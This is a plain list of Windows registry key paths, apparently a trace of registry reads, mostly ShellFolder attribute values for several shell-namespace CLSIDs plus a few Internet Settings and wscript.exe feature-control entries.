HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
